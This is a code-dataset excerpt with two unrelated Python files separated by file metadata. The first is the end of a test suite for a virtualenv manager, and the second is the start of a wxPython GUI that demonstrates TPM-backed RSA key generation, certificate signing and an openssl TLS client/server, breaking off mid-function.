)
self.run_cli(["converge"])
mtime = os.path.getmtime(file.name)
self.run_cli(["converge"])
self.assertEqual(os.path.getmtime(file.name), mtime)
def test_it_stops_post_commands_on_error(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
file = NamedTemporaryFile(delete=False)
self.addCleanup(os.remove, file.name)
mtime = os.path.getmtime(file.name)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), f"""
[virtualenv.a]
post-commands = [
["false"],
["touch", "{file.name}"],
]
""",
)
self.run_cli(["converge"])
self.assertEqual(os.path.getmtime(file.name), mtime)
def test_bundles(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar", "bla"]
[virtualenv.a]
install = ["foo"]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo", "bar", "bla"}, set()),
)
def test_modifying_a_bundle_recreates_envs_using_it(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar"]
[virtualenv.a]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"bar"}, set()),
)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
dev = ["bar", "baz"]
[virtualenv.a]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"bar", "baz"}, set()),
)
def test_no_such_bundle(self):
self.assertFalse(self.locator.for_name("a").exists_on(self.filesystem))
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
install = ["foo"]
install-bundle = ["dev"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
(set(), set()),
)
def test_it_does_not_blow_up_by_default_on_install(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnInstall]
[virtualenv.c]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
self.locator.for_name("c").exists_on(self.filesystem),
),
tuple((set(), set()) for _ in "abc") + (True,),
)
self.assertIn(
"'magicExplodingVirtualenvOnInstall' failed",
self.stderr.getvalue(),
)
def test_it_can_be_asked_to_blow_up_immediately_on_install(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnInstall]
[virtualenv.c]
""",
)
with self.assertRaises(ZeroDivisionError):
self.run_cli(["converge", "--fail-fast"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.locator.for_name("c").exists_on(self.filesystem),
),
((set(), set()), (set(), set()), False),
)
def test_it_does_not_blow_up_by_default_on_create(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnCreate]
[virtualenv.c]
""",
)
self.run_cli(["converge"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.installed(self.locator.for_name("c")),
self.locator.for_name("c").exists_on(self.filesystem),
),
tuple((set(), set()) for _ in "abc") + (True,),
)
self.assertIn(
"'magicExplodingVirtualenvOnCreate' failed",
self.stderr.getvalue(),
)
def test_it_can_be_asked_to_blow_up_immediately_on_create(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
[virtualenv.b]
[virtualenv.magicExplodingVirtualenvOnCreate]
[virtualenv.c]
""",
)
with self.assertRaises(ZeroDivisionError):
self.run_cli(["converge", "--fail-fast"])
self.assertEqual(
(
self.installed(self.locator.for_name("a")),
self.installed(self.locator.for_name("b")),
self.locator.for_name("c").exists_on(self.filesystem),
),
((set(), set()), (set(), set()), False),
)
def test_specified_python(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
python = "python3"
""",
)
self.run_cli(["converge"])
# FIXME: this doesn't properly assert about the python version...
self.assertEqual(
self.installed(self.locator.for_name("a")),
(set(), set()),
)
def test_custom_link_dir(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
link_dir = self.link_dir.descendant("some", "child", "bin")
self.run_cli(["converge", "--link-dir", str(link_dir)])
self.assertEqual(
self.filesystem.readlink(link_dir / "foo"),
self.locator.for_name("a").binary("foo"),
)
def test_link_exists(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.touch(self.link_dir.descendant("foo"))
with self.assertRaises(FileExists):
self.run_cli(["converge"])
def test_link_exists_as_broken_symlink(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.link(
source=self.link_dir.descendant("broken"),
to=self.link_dir.descendant("foo"),
)
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"foo": self.locator.for_name("a").binary("foo")},
)
def test_conflicting_links(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link = ["foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_conflicting_links_via_rename(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link = ["bar:foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_specified_link_name(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo:fooBar"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"fooBar": self.locator.for_name("a").binary("foo")},
)
def test_missing_link_dir(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
""",
)
self.filesystem.remove_empty_directory(self.link_dir)
self.assertFalse(self.filesystem.is_dir(path=self.link_dir))
self.run_cli(["converge"])
self.assertEqual(
self.linked,
{"foo": self.locator.for_name("a").binary("foo")},
)
def test_link_m_module(self):
"""
It links modules run via -m as wrappers.
"""
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.run_cli(["converge"])
contents = self.filesystem.get_contents(
self.link_dir.descendant("this"),
)
self.assertEqual(
contents.splitlines()[0],
"#!" + str(self.locator.for_name("a").binary("python")),
)
def test_link_m_module_specified_name(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this:that"]
""",
)
self.run_cli(["converge"])
contents = self.filesystem.get_contents(
self.link_dir.descendant("that"),
)
self.assertEqual(
contents.splitlines()[0],
"#!" + str(self.locator.for_name("a").binary("python")),
)
def test_link_m_module_duplicated(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["foo"]
[virtualenv.b]
[virtualenv.c]
link-module = ["bar:foo"]
""",
)
with self.assertRaises(_config.DuplicatedLinks) as e:
self.run_cli(["converge"])
self.assertIn("foo", str(e.exception))
self.assertEqual(self.linked, {})
def test_link_m_module_replaces_generated_files(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.run_cli(["converge"])
# Just change the config in a way that will re-converge
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this", "that"]
""",
)
self.run_cli(["converge"])
def test_link_m_module_does_not_replace_non_venvs_wrappers(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link-module = ["this"]
""",
)
self.filesystem.touch(self.link_dir.descendant("this"))
with self.assertRaises(FileExists):
self.run_cli(["converge"])
def test_linking_the_same_binary_twice(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
link = ["this:that", "this"]
""",
)
self.run_cli(["converge"])
this = self.locator.for_name("a").binary("this")
self.assertEqual(self.linked, dict(this=this, that=this))
def test_changing_a_bundle_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
one = ["foo"]
[virtualenv.a]
install-bundle = ["one"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo"}, set()),
)
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[bundle]
one = ["foo", "bar"]
[virtualenv.a]
install-bundle = ["one"]
""",
)
self.run_cli(["converge"])
self.assertEqual(
self.installed(self.locator.for_name("a")),
({"foo", "bar"}, set()),
)
def test_missing_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.remove_file(venv.path / "installed.json")
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
def test_invalid_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.set_contents(
venv.path / "installed.json",
"not even json",
)
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
def test_valid_json_invalid_config_recreates_the_venv(self):
self.filesystem.set_contents(
self.locator.root.descendant("virtualenvs.toml"), """
[virtualenv.a]
""",
)
self.run_cli(["converge"])
venv = self.locator.for_name("a")
self.filesystem.set_contents(venv.path / "installed.json", "{}")
some_random_file = venv.path / "some-random-file"
self.filesystem.touch(some_random_file)
self.assertTrue(self.filesystem.is_file(some_random_file))
# Now the file should disappear as the venv gets recreated
self.run_cli(["converge"])
self.assertFalse(self.filesystem.is_file(some_random_file))
| 31.026354
| 79
| 0.541928
| 2,110
| 21,191
| 5.267299
| 0.092891
| 0.090067
| 0.070542
| 0.090696
| 0.862786
| 0.851719
| 0.84713
| 0.829944
| 0.826075
| 0.819507
| 0
| 0.000343
| 0.31301
| 21,191
| 682
| 80
| 31.071848
| 0.763086
| 0.015573
| 0
| 0.694853
| 0
| 0.001838
| 0.262804
| 0.013248
| 0
| 0
| 0
| 0.001466
| 0.117647
| 1
| 0.056985
| false
| 0
| 0.012868
| 0
| 0.071691
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
77f4d8e31ca9285fb421b901b1ef230bdf3961cd
| 62,750
|
py
|
Python
|
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | 1
|
2022-02-09T20:46:05.000Z
|
2022-02-09T20:46:05.000Z
|
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | null | null | null |
Python_TPM20_GUI/tab3_engine.py
|
RaymWong/optiga-tpm-explorer
|
9a05849205784c4540f22d757f521092c86f2135
|
[
"MIT"
] | 1
|
2022-02-15T02:36:28.000Z
|
2022-02-15T02:36:28.000Z
|
import wx
import shell_util as exec_cmd
import multiprocessing
import time
import os
import subprocess
from subprocess import call
import images as img
# from wx.lib.pubsub import setuparg1
# from wx.lib.pubsub import pub as Publisher
from pubsub import pub as Publisher
import threading
from threading import Thread
import signal
import ctypes
"""
Already done: The creation of the server and CA keypairs, CA self-signed certificate. RSA miscellaneous functions and hashing are okay already.
TO-DO: Get the start_client/start_server and write_client/write_server functions to work. The aim of the two tabs are to:
Display a client and server process that connect to each other using the TPM commands.
Additionally show connectivity by sending messages from client/server and showing that the message appears in the server/client.
Running subprocess does not block the UI, however, sending messages through the PIPE in subprocess does block the UI.
The main issue here is the many methods of sending messages to the client/server processes are blocking (the UI).
"""
# indices 0 and 1 respectively; must match the ComboBox choices in Tab_RNG
rng_type_list = ['hex', 'base64']
server_proc = None
server_thread = None
client_proc = None
client_thread = None
server_log = None
client_log = None
RSA_Server_thread_active_flag = 0
RSA_Client_thread_active_flag = 0
ecc_server_proc = None
ecc_server_thread = None
ecc_client_proc = None
ecc_client_thread = None
ECC_Server_thread_active_flag = 0
ECC_Client_thread_active_flag = 0
def ServerProcess(server_log):
global server_proc
if (server_proc is not None):
try:
server_proc.terminate()
except OSError:
server_proc = None
#server_proc = exec_cmd.createProcess("openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss", server_log)
server_proc = exec_cmd.createProcess("lxterminal --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
def ClientProcess(client_log):
global client_proc
if (client_proc is not None):
try:
client_proc.terminate()
except OSError:
client_proc = None
client_proc = exec_cmd.createProcess("lxterminal --command='openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem'", client_log)
def LogReader(text_server, text_client, server_log, client_log):
print(("server log is: " + str(server_log)))
print(("client log is: " + str(client_log)))
print(("text_server is: " + str(text_server)))
print(("text_client is: " + str(text_client)))
time.sleep(2)
server_log.seek(0)
client_log.seek(0)
while (True):
line_client = client_log.readline()
if (line_client != ''):
text_client.AppendText(line_client + "\n")
line_server = server_log.readline()
if (line_server != ''):
text_server.AppendText(line_server + "\n")
# check and kill the processes if they are still running
def checkProcesses():
global server_proc, client_proc, server_log, client_log
if (server_proc is not None):
try:
server_proc.terminate()
except OSError:
server_proc = None
if (client_proc is not None):
try:
client_proc.terminate()
except OSError:
client_proc = None
if (server_log is not None):
server_log.close()
if (client_log is not None):
client_log.close()
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
ps_command = subprocess.Popen("ps -o pid --ppid %d --noheaders" % parent_pid, shell=True, stdout=subprocess.PIPE)
ps_output = ps_command.stdout.read()
retcode = ps_command.wait()
#assert retcode == 0, "ps command returned %d" % retcode
if (retcode==0):
for pid_str in ps_output.split("\n".encode())[:-1]:
os.kill(int(pid_str), sig)
else:
print("ps command returned %d" % retcode)
class RSA_Server_Thread(threading.Thread):
def __init__(self, threadID, Process):
global RSA_Server_thread_active_flag
threading.Thread.__init__(self)
self.threadID = threadID
self.Process = Process
        self.daemon = True
RSA_Server_thread_active_flag=1
def run(self):
global RSA_Server_thread_active_flag,server_proc
try:
while RSA_Server_thread_active_flag==1 :
line = self.Process.stdout.readline()
                if line:  # skip empty reads (EOF); also correct if stdout yields bytes
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg=line)
#os.write(1, line)
#print line
#else:
# break
finally:
RSA_Server_thread_active_flag=0
print("Exit RSA server Thread")
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="Server Stopped..\n")
def get_id(self):
# returns id of the respective thread
if hasattr(self, '_thread_id'):
return self._thread_id
for id, thread in list(threading._active.items()):
if thread is self:
print("thread ID")
print(id)
return id
def raise_exception(self):
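        # Asks CPython to asynchronously raise SystemExit in this thread via
        # PyThreadState_SetAsyncExc (a CPython-specific API). Per its docs, a
        # return value greater than 1 means more than one thread was affected
        # and the call must be undone by passing 0, as below.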
thread_id = self.get_id()
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id,ctypes.py_object(SystemExit))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)
print('Exception raise failure')
class RSA_Client_Thread(threading.Thread):
def __init__(self, threadID, Process):
global RSA_Client_thread_active_flag
threading.Thread.__init__(self)
self.threadID = threadID
self.Process = Process
        self.daemon = True
RSA_Client_thread_active_flag=1
def run(self):
global RSA_Client_thread_active_flag,client_proc
while RSA_Client_thread_active_flag==1 :
line = self.Process.stdout.readline()
            if line:  # skip empty reads (EOF); also correct if stdout yields bytes
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg=line)
#else:
# break
RSA_Client_thread_active_flag=0
#self.Process.terminate()
#self.Process.wait()
#client_proc=None
print("Exit RSA client Thread")
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Client Stopped..\n")
class Tab_RSA_CS(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.HORIZONTAL)
steps_sizer = wx.BoxSizer(wx.VERTICAL)
server_sizer = wx.BoxSizer(wx.VERTICAL)
client_sizer = wx.BoxSizer(wx.VERTICAL)
# instantiate the objects
button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48))
button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48))
button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48))
button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48))
button_start_server = wx.Button(self, -1, 'Start/Stop Server')
button_start_client = wx.Button(self, -1, 'Start/Stop Client')
button_write_from_server = wx.Button(self, -1, 'Write to Client')
button_write_from_client = wx.Button(self, -1, 'Write to Server')
button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48))
button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48))
self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.input_client = wx.TextCtrl(self, -1,value="Send from Client")
self.input_server = wx.TextCtrl(self, -1,value="Send from Server")
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the sizers to the main sizer
mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
# attach the objects to the sizers
steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.AddSpacer(236)
steps_sizer.Add(backbutton, 0, wx.ALL, 5)
server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5)
# Set tooltips
button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA)."))
button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server."))
button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key."))
button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client)
self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server)
self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca)
self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair)
self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr)
self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert)
self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server)
self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client)
self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server)
self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
# Setup Publisher for text field update
Publisher.subscribe(self.Upd_Server_Status, "Server_Text")
Publisher.subscribe(self.Upd_Client_Status, "Client_Text")
self.server_multiproc = None
self.client_multiproc = None
self.log_reader_multiproc = None
self.SetSizer(mainsizer)
def Upd_Server_Status(self,msg):
self.text_server.AppendText(msg)
def Upd_Client_Status(self,msg):
self.text_client.AppendText(msg)
def OnFlushClient(self, evt):
self.text_client.Clear()
def OnFlushServer(self, evt):
self.text_server.Clear()
    # The direct parent is the notebook and the notebook's parent is the
    # frame, so we reach up two levels to ask the frame to close.
def OnBack(self, evt):
#~ global server_proc,client_proc,RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
#~ if (server_proc is not None):
#~ RSA_Server_thread_active_flag=0
#~ if (client_proc is not None):
#~ RSA_Client_thread_active_flag=0
#~ print "Client Thread Active..killing it: %d \n" % client_proc.pid
#~ kill_child_processes(client_proc.pid)
#~ client_proc.terminate()
#~ client_proc.wait()
#~ client_proc = None
#~ print "Server Thread Active..killing it: %d \n" % server_proc.pid
#~ kill_child_processes(server_proc.pid)
#~ #server_proc.stdin.write("stop\n")
#~ #server_thread.raise_exception()
#~ #server_thread.join()
#~ server_proc.terminate()
#~ server_proc.wait()
#~ server_proc = None
self.Parent.Parent.OnCloseWindow(None)
def Destroy(self):
global server_proc,client_proc,RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
if (server_proc is not None):
RSA_Server_thread_active_flag=0
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
print("Server Thread Active..killing it: %d \n" % server_proc.pid)
kill_child_processes(server_proc.pid)
server_proc.terminate()
server_proc.wait()
server_proc = None
def OnGenCA1(self, evt):
self.text_server.AppendText("Generating CA key-pair...\n")
wx.CallLater(10, self.OnGenCA)
def OnGenCA(self):
exec_cmd.execCLI(["rm", "rsa_CA.tss", ])
exec_cmd.execCLI(["rm", "CA_rsa_cert.pem", ])
exec_cmd.execCLI(["rm", "rsa_server.tss", ])
exec_cmd.execCLI(["rm", "server_rsa.csr", ])
exec_cmd.execCLI(["rm", "CAsigned_rsa_cert.crt", ])
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"-o",exec_cmd.ownerAuth,
"rsa_CA.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a rsa -o %s rsa_CA.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
cmd =" openssl req -config temp.conf -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa_CA.tss",
])
self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a rsa rsa_CA.tss'\n" )
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
cmd =" openssl req -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.text_server.AppendText(str(command_output))
self.text_server.AppendText(str(cmd)+"\n")
#~ self.text_server.AppendText("openssl req -key rsa_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenKeyPair1(self, evt):
self.text_server.AppendText("Generating SERVER key-pair...\n")
wx.CallLater(10, self.OnGenKeyPair)
def OnGenKeyPair(self):
if (exec_cmd.ownerAuth !=""):
exec_cmd.execCLI([
"tpm2tss-genkey",
"-o",exec_cmd.ownerAuth,
"-a", "rsa",
"rsa_server.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -o %s -a rsa rsa_server.tss'\n" %exec_cmd.ownerAuth)
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa_server.tss",
])
self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a rsa rsa_server.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCSR1(self, evt):
self.text_server.AppendText("Creating Certificate Signing Request...\n")
wx.CallLater(10, self.OnGenCSR)
def OnGenCSR(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
#~ self.text_server.AppendText("Creating Certificate Signing Request:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "rsa_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_rsa.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "rsa_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_rsa.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCert(self, evt):
self.text_server.AppendText("Creating Server Certificate...\n")
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
#~ command_output = exec_cmd.execCLI([
#~ "OPENSSL_CONF=temp.conf", "openssl", "x509",
#~ "-req", "-in", "server_rsa.csr",
#~ "-CA","CA_rsa_cert.pem",
#~ "-CAkey", "rsa_CA.tss", "-engine tpm2tss",
#~ "-CAkeyform", "engine",
#~ "-out", "CAsigned_rsa_cert.crt",
#~ "-days", "365", "-sha256", "-CAcreateserial",
#~ ])
#~ self.text_server.AppendText(str(command_output))
self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial\n")
else:
command_output = exec_cmd.execCLI([
